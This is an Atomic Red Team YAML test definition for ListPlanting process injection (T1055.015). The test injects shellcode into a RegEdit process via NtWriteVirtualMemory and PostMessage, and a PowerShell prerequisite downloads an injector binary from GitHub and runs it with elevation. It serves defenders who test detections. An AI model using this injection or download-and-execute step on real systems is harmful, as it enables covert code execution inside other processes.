Files
atomic-red-team/atomics/T1055.015/T1055.015.yaml
2023-11-17 17:35:43 +00:00

31 lines
1.6 KiB
YAML

attack_technique: T1055.015
display_name: 'Process Injection: ListPlanting'
atomic_tests:
- name: Process injection ListPlanting
auto_generated_guid: 4f3c7502-b111-4dfe-8a6e-529307891a59
description: 'This test injects shellcode into a remote RegEdit process using the ListPlanting technique. ListPlanting exploits Window with ListView control. Code write to memory with NtWriteVirtualMemory. The shellcode is executed via PostMessage. When successful, a message box will appear with the title "Warning" and the content "Atomic Red Team" after a few seconds. Notepad will open following the appearance of the message box.'
supported_platforms:
- windows
input_arguments:
exe_binary:
description: PE binary
type: path
default: PathToAtomicsFolder\T1055.015\bin\ListPlanting.exe
dependency_executor_name: powershell
dependencies:
- description: |
Injector ListPlanting.exe must exist at specified location (#{exe_binary})
prereq_command: |
if (Test-Path "#{exe_binary}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{exe_binary}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.015/bin/ListPlanting.exe" -OutFile "#{exe_binary}"
executor:
command: |-
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
cleanup_command: 'Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force'
name: powershell
elevation_required: true